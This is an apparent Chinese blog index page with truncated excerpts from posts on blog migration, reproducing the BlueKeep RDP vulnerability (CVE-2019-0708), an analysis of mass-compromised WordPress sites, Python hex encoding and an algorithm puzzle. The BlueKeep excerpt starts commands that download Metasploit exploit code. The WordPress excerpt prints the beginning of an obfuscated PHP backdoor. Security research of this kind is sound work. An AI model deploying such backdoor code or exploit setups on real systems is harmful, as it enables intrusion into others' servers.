博客从Github Page移植到了Blogspot

为什么要移植 一直用hexo托管在Github上有几点体验不要好的地方 没有评论系统，虽然有很多插件，但是不能及时的通知提醒 写博客体验比较不好，虽说这种方式比较极客，Markdown本身语法比较简单，有些复杂的排版需要用html标签来实现，比较难受 没有后台管理系统，全靠git来管理，方式较极客，但不友好 更新博客之后需要刷新两次才能更新页面 综上，当时跟风的我现在苦逼的将博客全手工移植到来这里，😢 ...

Continue reading →

CVE-2019-0708漏洞复现

具体PR: https://github.com/rapid7/metasploit-framework/pull/12283 准备操作 Linux 直接看 http://blog.xkkhh.cn/archives/535 MacOS 1 2 3 4 5 6 7 8 9 10 11 # Download wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget...

Continue reading →

超过35000个WordPress站被攻破事件分析

一开始看到了 https://www.v2ex.com/t/588483 这个帖子 找到了 https://twitter.com/blackorbird/status/1158377821963575296 🐎 1 <?php goto D242; Cfc5: echo "\x61\x75\x78\x36\x54\150\x65\151\157\x47\150\165\x65\x51\x75\63"; goto e83e; f7cc: B487: goto d892; Ff02: chmod($C43e, 0755); goto b30d;...

Continue reading →

Python字符串十六进制编码的破事

刚才做ctf题目发现这种十六进制编码还是挺烦的, 整理一下思绪 1 2 string <-> hex string string <-> dec integer 彻底解决这些烦人的玩意 string <-> hex string hex string">string -> hex string 1 2 3 4 5 6 # all python version import binascii binascii.b2a_hex('string') binascii.hexlify('string') # only python2 'string'.encode('hex') a class="headerlink" href="https://comwrg.github.io/2019/08/06/string-to-hex-using-python/#string-lt-hex-string"...

Continue reading →

算法题-BAT最小交换次数

题目 IT产业人才需求节节攀升。业内巨头百度、阿里巴巴、腾讯（简称BAT）在某海滩进行招聘活动。 招聘部门一字排开。由于是自由抢占席位，三大公司的席位随机交错在一起，形如： ABABTATT，这使得应聘者十分别扭。 于是，管理部门要求招聘方进行必要的交换位置，使得每个集团的席位都挨在一起。即最后形如： BBAAATTT 这样的形状，当然，也可能是： AAABBTTT 等。 现在，假设每次只能交换2个席位，并且知道现在的席位分布， 你的任务是计算：要使每个集团的招聘席位都挨在一起需要至少进行多少次交换动作。 输入是一行n个字符（只含有字母B、A或T），表示现在的席位分布。 输出是一个整数，表示至少交换次数。 比如，输入： TABTABBTTTT 程序应该输出： 3 再比如，输入： TTAAABB 程序应该输出： 0 我们约定，输入字符串的长度n 不大于10万 资源约定： 峰值内存消耗（含虚拟机）...

Continue reading →